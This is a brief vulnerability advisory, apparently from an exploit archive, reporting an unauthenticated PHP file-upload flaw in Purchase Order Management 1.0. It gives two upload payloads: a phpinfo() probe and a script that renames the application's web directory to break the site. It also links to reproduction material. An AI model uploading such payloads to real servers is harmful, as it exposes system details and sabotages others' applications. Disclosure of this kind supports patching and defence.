Headline
Purchase Order Management 1.0 Shell Upload
Purchase Order Management version 1.0 suffers a remote shell upload vulnerability. Flow details to achieve this are shown in the video link provided.
## Title: Purchase Order Management-1.0 - File Inclusion Vulnerabilities - Unprivileged user interaction - file upload in the server## Author: nu11secur1ty## Date: 03.06.2023## Vendor: https://www.sourcecodester.com/user/257130/activity## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/## Description:The Purchase Order Management-1.0 suffer from File Inclusion Vulnerabilities.The users of this system are allowed to submit input into files orupload files to the server.The malicious attacker can get absolute control of this system!STATUS: CRITICAL Vulnerability[+]Get Info:```PHP<?php// by nu11secur1ty - 2023 phpinfo();?>```[+]Exploit:```PHP<?php// by nu11secur1ty - 2023// Old Name Of The file$old_name = "C:/xampp7/htdocs/purchase_order/" ;// New Name For The File$new_name = "C:/xampp7/htdocs/purchase_order_stupid/" ;// using rename() function to rename the filerename( $old_name, $new_name) ;?>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0)## Proof and Exploit:[href](https://streamable.com/vkq31h)## Time spend:00:35:00